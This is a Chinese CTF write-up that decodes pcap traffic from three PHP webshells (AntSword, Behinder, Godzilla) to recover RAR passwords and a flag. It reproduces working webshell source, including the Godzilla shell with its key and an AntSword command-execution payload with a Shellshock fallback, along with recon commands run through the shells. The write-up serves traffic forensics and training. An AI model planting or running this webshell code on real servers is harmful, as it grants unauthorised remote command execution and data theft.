【流量分析】webshell三巨头

一道流量分析题,包含三个经典webshell流量

webshell三巨头.pcapng

从题目名称可以猜测到,应该是三种不同的webshell工具流量,主流的三个webshell:蚁剑、冰蝎、哥斯拉

打开后发现,主要请求了三个目录:web2/shell1.php、web2/shell2.php、web2/shell3.php,可见对应着三种不同的webshell

image

接着分别过滤出三个的流量,以过滤shell1为例:http.request.full_uri contains "shell1.php" or http.response_for.uri contains "shell1.php"

分析shell1

从请求的参数和特征看,这个像是蚁剑的流量,去除前两个干扰字符后解base64可以得到待执行的命令

image

解出所有命令:

cd /d "D:\0.phpstudy_pro\WWW\web2"&dir&echo [S]&cd&echo [E] 列目录

cd /d "D:\0.phpstudy_pro\WWW\web2"&type shell1.php&echo [S]&cd&echo [E] 查看shell1.php

cd /d "D:\0.phpstudy_pro\WWW\web2"&type shell2.php&echo [S]&cd&echo [E] 查看shell2.php

cd /d "D:\0.phpstudy_pro\WWW\web2"&type shell3.php&echo [S]&cd&echo [E] 查看shell3.php

D:/0.phpstudy_pro/WWW/web2/

D:/0.phpstudy_pro/WWW/web2/flag1.rar 查看flag1.rar

响应使用base64解不出,应该是混合加密或者魔改了加密等

最后一个请求的响应是明文,因此可以得到flag1.rar,但是zip被加密了

image

分析shell2.php

查看一系列请求响应,发现body部分为一大段base64,响应也为一大段base64,没有key=value的结构,判断为冰蝎流量

使用默认密钥(rebeyond)尝试解密,解密成功

image

在线解密:https://the-x.cn/zh-cn/cryptography/Aes.aspx

解密最后一个请求和响应

mode="c2hvdw";mode="c2hvdw";mode=base64_decode(mode);mode);path="RDovMC5waHBzdHVkeV9wcm8vV1dXL3dlYjIvc2hlbGwxLnBocA";path=base64decode(path=base64_decode(path);hash="";hash="";blockIndex="";blockSize="";blockSize="";content="";content=base64decode(content=base64_decode(content);charset="";charset="";newpath="";createTimeStamp="";createTimeStamp="";accessTimeStamp="";modifyTimeStamp="";main(modifyTimeStamp=""; main(mode,path,path,hash,blockIndex,blockIndex,blockSize,content,content,charset,newpath,newpath,createTimeStamp,accessTimeStamp,accessTimeStamp,modifyTimeStamp);

show D:/0.phpstudy_pro/WWW/web2/shell1.php

响应

{"status":"c3VjY2Vzcw==","msg":"UEQ5d2FIQU5Da0J6WlhOemFXOXVYM04wWVhKMEtDazdEUW9rY0hka1BTZGhiblFuT3cwS0pHdGxlVDFBYzNWaWMzUnlLSE4wY2w5d1lXUW9jMlZ6YzJsdmJsOXBaQ2dwTERFMkxDZGhKeWtzTUN3eE5pazdEUXBBWlhaaGJDaHZjR1Z1YzNOc1gyUmxZM0o1Y0hRb1ltRnpaVFkwWDJSbFkyOWtaU2drWDFCUFUxUmJKSEIzWkYwcExDQW5RVVZUTFRFeU9DMUZRMEluTENBa2EyVjVMQ0JQVUVWT1UxTk1YMUpCVjE5RVFWUkJmRTlRUlU1VFUweGZXa1ZTVDE5UVFVUkVTVTVIS1NrN0RRby9QZz09"}

因此得到了shell1.php内容

接着解密

请求

mode="c2hvdw";mode="c2hvdw";mode=base64_decode(mode);mode);path="RDovMC5waHBzdHVkeV9wcm8vV1dXL3dlYjIvc2hlbGwzLnBocA";path=base64decode(path=base64_decode(path);hash="";hash="";blockIndex="";blockSize="";blockSize="";content="";content=base64decode(content=base64_decode(content);charset="";charset="";newpath="";createTimeStamp="";createTimeStamp="";accessTimeStamp="";modifyTimeStamp="";main(modifyTimeStamp=""; main(mode,path,path,hash,blockIndex,blockIndex,blockSize,content,content,charset,newpath,newpath,createTimeStamp,accessTimeStamp,accessTimeStamp,modifyTimeStamp);

show D:/0.phpstudy_pro/WWW/web2/shell3.php

响应

{"status":"c3VjY2Vzcw","msg":"UEQ5d2FIQU5DbVYyWVd3b0pGOVFUMU5VV3lKamRHWWlYU2s3RFFvPQ"}

因此得到了shell2.php你内容

请求

mode="ZG93bmxvYWRQYXJ0";mode="ZG93bmxvYWRQYXJ0";mode=base64_decode(mode);mode);path="RDovMC5waHBzdHVkeV9wcm8vV1dXL3dlYjIvZmxhZzIucmFy";path=base64decode(path=base64_decode(path);hash="";hash="";blockIndex="MA";blockIndex=base64decode(blockIndex=base64_decode(blockIndex);blockSize="MTA0ODU3Ng";blockSize="MTA0ODU3Ng";blockSize=base64_decode(blockSize);blockSize);content="";charset="";charset="";newpath="";createTimeStamp="";createTimeStamp="";accessTimeStamp="";modifyTimeStamp="";main(modifyTimeStamp=""; main(mode,path,path,hash,blockIndex,blockIndex,blockSize,content,content,charset,newpath,newpath,createTimeStamp,accessTimeStamp,accessTimeStamp,modifyTimeStamp);

downloadPart D:/0.phpstudy_pro/WWW/web2/flag2.rar

解密响应,保存flag2.rar

image

响应

驱动器 D 中的卷是 新加卷
卷的序列号是 700B-B7D2

D:\0.phpstudy_pro\WWW\web2 的目录

2023/10/23 08:35

.
2023/10/23 08:35 ..
2023/10/23 08:35 170 flag1.rar
2023/10/23 08:14 21 flag1.txt
2023/10/23 08:35 154 flag2.rar
2023/10/23 08:14 21 flag2.txt
2023/06/06 20:26 631,896 Rar.exe
2023/10/23 08:19 205 shell1.php
2023/10/23 08:19 205 shell1.txt
2023/09/29 16:44 299 shell2.php
2023/10/11 11:28 29 shell3.php
9 个文件 633,000 字节
2 个目录 334,656,536,576 可用字节

分析shell3

可以看到其中ctf参数的值是比较好理解的

image

进行urldecode后,使用reverse、base64decode即可

image


@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='flag123';
$payloadName='payload';
$key='03cbde474d6d8fe5';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
		eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

可以看到是很明显的哥斯拉shell,并且得到了pass和key,因此可以解密流量

image

解密流量得到执行的操作:

cmdLine cmd /c "cd /d "D:/0.phpstudy_pro/WWW/web2/"&ipconfig" 2>&1methodName

cmdLine 8 cmd /c "cd /d "D:/0.phpstudy_pro/WWW/web2/"&whoami" 2>&1methodName

cmdLine cmd /c "cd /d "D:/0.phpstudy_pro/WWW/web2/"&netstat -anplt" 2>&1methodName

cmdLine 5 cmd /c "cd /d "D:/0.phpstudy_pro/WWW/web2/"&rar" 2>&1methodName

cmd /c "cd /d "D:/0.phpstudy_pro/WWW/web2/"&rar a flag1.rar flag1.txt -p#ctf@flag123#" 2>&1methodName

cmd /c "cd /d "D:/0.phpstudy_pro/WWW/web2/"&rar a flag2.rar flag2.txt -p#flag@ctf123#" 2>&1methodName

methodName getFiledirName D:/0.phpstudy_pro/WWW/web2/

fileName D:/0.phpstudy_pro/WWW/web2/shell3.php methodName readFileContent

fileName D:/0.phpstudy_pro/WWW/web2/shell2.php methodName readFileContent

fileName D:/0.phpstudy_pro/WWW/web2/shell1.php methodName readFileContent

加粗的是比较关键的命令,分别使用密码压缩了flag.txt,结合前面获取的flag1.rar和flag2.rar,使用这里泄露的压缩密码即可解压得到flag

flag{14db06b9-c7eb-4bc1-8d86-6e115c61e57d}

后续分析

通过其它流量的分析得到了shell1.php内容

<?php
@session_start();
$pwd='ant';
$key=@substr(str_pad(session_id(),16,'a'),0,16);
@eval(openssl_decrypt(base64_decode($_POST[$pwd]), 'AES-128-ECB', $key, OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING));
?>

可以看到是通过AES-128-ECB加密的,密钥就是session_id,填充模式也有了,因此直接可以解密出来请求流量

image

代码格式化一下

@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out) {
	@session_start();
	$key=@substr(str_pad(session_id(),16,'a'),0,16);
	return @base64_encode(openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
}
;
;
function asoutput() {
	$output=ob_get_contents();
	ob_end_clean();
	echo "34e"."bf7";
	echo @asenc($output);
	echo "7b63"."0d0c6";
}
ob_start();
try {
	$p=base64_decode(substr($_POST["p9e688b4ca0ab"],2));
	$s=base64_decode(substr($_POST["g530f39d333c62"],2));
	$envstr=@base64_decode(substr($_POST["e872becae415ae"],2));
	$d=dirname($_SERVER["SCRIPT_FILENAME"]);
	$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
	if(substr($d,0,1)=="/") {
		@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
	} else {
		@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
	}
	if(!empty($envstr)) {
		$envarr=explode("|||asline|||", $envstr);
		foreach($envarr as $v) {
			if (!empty($v)) {
				@putenv(str_replace("|||askey|||", "=", $v));
			}
		}
	}
	$r="{$p} {$c}";
	function fe($f) {
		$d=explode(",",@ini_get("disable_functions"));
		if(empty($d)) {
			$d=array();
		} else {
			$d=array_map('trim',array_map('strtolower',$d));
		}
		return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
	}
	;
	function runshellshock($d, $c) {
		if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
			if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
				$tmp = tempnam(sys_get_temp_dir(), 'as');
				putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
				if (fe('error_log')) {
					error_log("a", 1);
				} else {
					mail("[email protected]", "", "", "-bv");
				}
			} else {
				return False;
			}
			$output = @file_get_contents($tmp);
			@unlink($tmp);
			if ($output != "") {
				print($output);
				return True;
			}
		}
		return False;
	}
	;
	function runcmd($c) {
		$ret=0;
		$d=dirname($_SERVER["SCRIPT_FILENAME"]);
		if(fe('system')) {
			@system($c,$ret);
		} elseif(fe('passthru')) {
			@passthru($c,$ret);
		} elseif(fe('shell_exec')) {
			print(@shell_exec($c));
		} elseif(fe('exec')) {
			@exec($c,$o,$ret);
			print(join("
",$o));
		} elseif(fe('popen')) {
			$fp=@popen($c,'r');
			while(!@feof($fp)) {
				print(@fgets($fp,2048));
			}
			@pclose($fp);
		} elseif(fe('proc_open')) {
			$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
			while(!@feof($io[1])) {
				print(@fgets($io[1],2048));
			}
			while(!@feof($io[2])) {
				print(@fgets($io[2],2048));
			}
			@fclose($io[1]);
			@fclose($io[2]);
			@proc_close($p);
		} elseif(fe('antsystem')) {
			@antsystem($c);
		} elseif(runshellshock($d, $c)) {
			return $ret;
		} elseif(substr($d,0,1)!="/" && @class_exists("COM")) {
			$w=new COM('WScript.shell');
			$e=$w->exec($c);
			$so=$e->StdOut();
			$ret.=$so->ReadAll();
			$se=$e->StdErr();
			$ret.=$se->ReadAll();
			print($ret);
		} else {
			$ret = 127;
		}
		return $ret;
	}
	;
	$ret=@runcmd($r." 2>&1");
	print ($ret!=0)?"ret={$ret}":"";
	;
}
catch(Exception $e) {
	echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();

关注到asoutput和asenc函数,知道响应体也是AES加密,密钥也是session_id,并且添加了干扰字符,根据加密逻辑进行解密

image

image

至此shell1-蚁剑的所有请求和响应流量都可以解出来了